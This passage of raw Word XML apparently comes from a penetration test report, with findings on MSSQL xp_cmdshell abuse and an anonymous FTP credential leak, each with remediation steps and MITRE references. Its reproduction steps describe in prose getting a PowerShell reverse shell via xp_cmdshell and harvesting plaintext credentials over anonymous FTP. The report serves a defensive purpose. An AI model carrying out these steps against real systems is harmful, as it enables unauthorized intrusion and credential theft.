          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, gaining complete control and access to sensitive data and internal systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="281251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11AE8887" w14:textId="09AF7FFF">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45693DE3" w:rsidP="0D325B6E" w:rsidRDefault="45693DE3" w14:paraId="4A405D07" w14:textId="5B724EF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693DE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5693DE3" w:rsidP="0D325B6E" w:rsidRDefault="45693DE3" w14:paraId="34F5A414" w14:textId="3C7F3EA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693DE3">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1526A926">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Log into the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MSSQL Server with </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6173FDBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>previously</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found credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="25756DAB" w:rsidP="0D325B6E" w:rsidRDefault="25756DAB" w14:paraId="350D90D2" w14:textId="2A4B5B4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Step 2. Run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whoami</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to verify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level and that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is enabled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="25756DAB" w:rsidP="0D325B6E" w:rsidRDefault="25756DAB" w14:paraId="166A895E" w14:textId="27A175E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Step 3. Use </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25756DAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to run a PowerShell reverse shell to gain access to the Windows server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="02A1350D" w14:textId="01F52A4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5693DE3" w:rsidP="0D325B6E" w:rsidRDefault="45693DE3" w14:paraId="20A7D1DE" w14:textId="775808E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693DE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5693DE3" w:rsidP="0D325B6E" w:rsidRDefault="45693DE3" w14:paraId="04C2EE22" w14:textId="322493D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5693DE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5693DE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5FE2B279">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212373ED" w:rsidP="0D325B6E" w:rsidRDefault="212373ED" w14:paraId="4DB7B8B5" w14:textId="2CC0F907">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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If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is not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for normal business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operations,</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use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sp_configure</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or Policy Based Management to disable the feature. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="212373ED" w:rsidP="0D325B6E" w:rsidRDefault="212373ED" w14:paraId="6BAB79E1" w14:textId="65BC533E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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If this feature is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use the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sp_xp_cmdshell_proxy_account</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system to configure </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xp_cmdshell</w:t>
      </w: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 xml:space="preserve"> to use a least-privileged account that has minimal risk of abuse.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="212373ED" w:rsidP="0D325B6E" w:rsidRDefault="212373ED" w14:paraId="686BA088" w14:textId="0578C041">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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2373ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ensure strong credentials are in place to access the MSSQL Server, to ensure only authorized users can access the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="37D69415" w14:textId="360038B3">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45693DE3" w:rsidP="0D325B6E" w:rsidRDefault="45693DE3" w14:paraId="17BAA1C6" w14:textId="7D32689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693DE3">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4519A16" w:rsidP="0D325B6E" w:rsidRDefault="24519A16" w14:paraId="712462E5" w14:textId="1B78B108">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R4aa67cb865c642a8">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="24519A16">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Microsoft - XP CMDSHELL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="24519A16">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05314E23" w14:textId="4FA5F3EB">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0C82E91B" w14:textId="01F2F4ED">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="21BAD07B" w:rsidP="0D325B6E" w:rsidRDefault="21BAD07B" w14:paraId="2DA422F0" w14:textId="359214AF">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r w:rsidRPr="0D325B6E" w:rsidR="21BAD07B">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="21BAD07B">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="21BAD07B">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> FTP Credential Leak</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2B4D676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720E84" w14:textId="513D4BE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EE8E4D5" w14:textId="1FC24CF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F3A35E" w14:textId="0472D79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44D1AAC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946B9E1" w14:textId="7B07D7A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B5D95F8" w14:textId="322F739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CD87B74" w14:textId="779C5C61">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8.</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>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7D45E49" w14:textId="1FB3685A">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3C9223B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F1AFCD9" w14:textId="01770A6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BBFED9C" w14:textId="1F31D5BB">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2D72646"/>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F4423AE"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="62344B7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EDBB91" w14:textId="202D3E5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5EB56BA" w14:textId="0747662A">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="25"/>
                <w:szCs w:val="25"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N" r:id="R7a06677640514fa1">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N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VI:L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VA:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>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SC:N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78217541">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FF5341" w14:textId="54EA2C1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CD4DE1" w14:textId="2E12548B">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3DF4FB4" w14:textId="2AC95C37">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rce427243b5b34c8c">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1552.001 - Unsecured Credentials: Credentials in files</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="791B9C9D">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3D310AE"/>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842240" w14:textId="5520455A">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AD10902" w14:textId="4AC60919">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a0e55c2c84234832">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1047: Audit</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1CA7E759" w14:textId="38CA43FF">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R47e2b5e9117a481a">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1027: Password Policies</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="25C762C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97C551" w14:textId="4F80700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B371A91" w14:textId="75A094D4">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37D20937" w14:textId="2786D559">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="21BAD07B" w:rsidP="0D325B6E" w:rsidRDefault="21BAD07B" w14:paraId="6510A2D2" w14:textId="3C6C2DC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1BAD07B" w:rsidP="0D325B6E" w:rsidRDefault="21BAD07B" w14:paraId="635E93A1" w14:textId="1D8F6BC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The FTP server </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permit</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="394E29E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ting</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anonymous </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7D1242ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logon</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70CC1A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5480D985">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">s </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sensitive information, including plaintext credentials for system </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0F92500E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="42B0D34A">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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="42B0D34A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an attacker to gain a foothold on the network through t</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="42B0D34A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>he leaked credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7A60453D" w14:textId="68CCF15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1BAD07B" w:rsidP="0D325B6E" w:rsidRDefault="21BAD07B" w14:paraId="114BC415" w14:textId="53D7D767">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1BAD07B">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1BAD07B" w:rsidP="0D325B6E" w:rsidRDefault="21BAD07B" w14:paraId="53E59BF7" w14:textId="65A14A3F">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use the exposed credentials to gain unauthorized access to other systems and </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1244B67C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>applications</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within the network, potentially leading to a full system compromise. This can result in </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2262A2AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sensitive</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data being stolen, </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financial loss</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and reputational damage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5803DFD5" w14:textId="09AF7FFF">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21BAD07B" w:rsidP="0D325B6E" w:rsidRDefault="21BAD07B" w14:paraId="259E9544" w14:textId="5B724EF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1BAD07B" w:rsidP="0D325B6E" w:rsidRDefault="21BAD07B" w14:paraId="729F6A65" w14:textId="17A086E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Step 1: Log into the FTP server with anonymous access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="21BAD07B" w:rsidP="0D325B6E" w:rsidRDefault="21BAD07B" w14:paraId="59298C65" w14:textId="2A39D6C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Step 2: Recursively list the files on the server to identify sensitive files with ‘ls -R’.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="21BAD07B" w:rsidP="0D325B6E" w:rsidRDefault="21BAD07B" w14:paraId="43CC5C23" w14:textId="1E34616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Step 3: Download any suspicious files using the get command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="21BAD07B" w:rsidP="0D325B6E" w:rsidRDefault="21BAD07B" w14:paraId="41AA304D" w14:textId="157D5A8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Step 4: Examine the contents of the downloaded file </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="21BAD07B">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and confirm the presence of plaintext credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4F4CD0BD" w14:textId="01F52A4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1BAD07B" w:rsidP="0D325B6E" w:rsidRDefault="21BAD07B" w14:paraId="6FE60F8F" w14:textId="775808E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1BAD07B" w:rsidP="0D325B6E" w:rsidRDefault="21BAD07B" w14:paraId="4D37D92B" w14:textId="322493D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1BAD07B" w:rsidP="0D325B6E" w:rsidRDefault="21BAD07B" w14:paraId="1912939D" w14:textId="0CBAC5BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Disable anonymous access by </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modifying</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the FTP </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="442CDD7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>server</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configuration file to disallow anonymous logins if sensitive/confidential information is stored on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="21BAD07B" w:rsidP="0D325B6E" w:rsidRDefault="21BAD07B" w14:paraId="07F498CF" w14:textId="60AD9978">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Audit and remove any sensitive files from the FTP Server directories. Implement a strong policy against storing such information on network shares.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="21BAD07B" w:rsidP="0D325B6E" w:rsidRDefault="21BAD07B" w14:paraId="1CB208C0" w14:textId="046A0F66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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21BAD07B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> policies to block the FTP server from being accessible from the outside internet and only from trusted internal network segments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1CC4EB95" w14:textId="1756D7D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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1BAD07B" w:rsidP="0D325B6E" w:rsidRDefault="21BAD07B" w14:paraId="62B8D539" w14:textId="7D32689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BAD07B">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1BAD07B" w:rsidP="0D325B6E" w:rsidRDefault="21BAD07B" w14:paraId="011D4CE7" w14:textId="37A45747">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R1c1917834e284116">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="21BAD07B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Cerberus - How to Secure an FTP Server </w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="21BAD07B" w:rsidP="0D325B6E" w:rsidRDefault="21BAD07B" w14:paraId="759DBDBD" w14:textId="6714E30D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
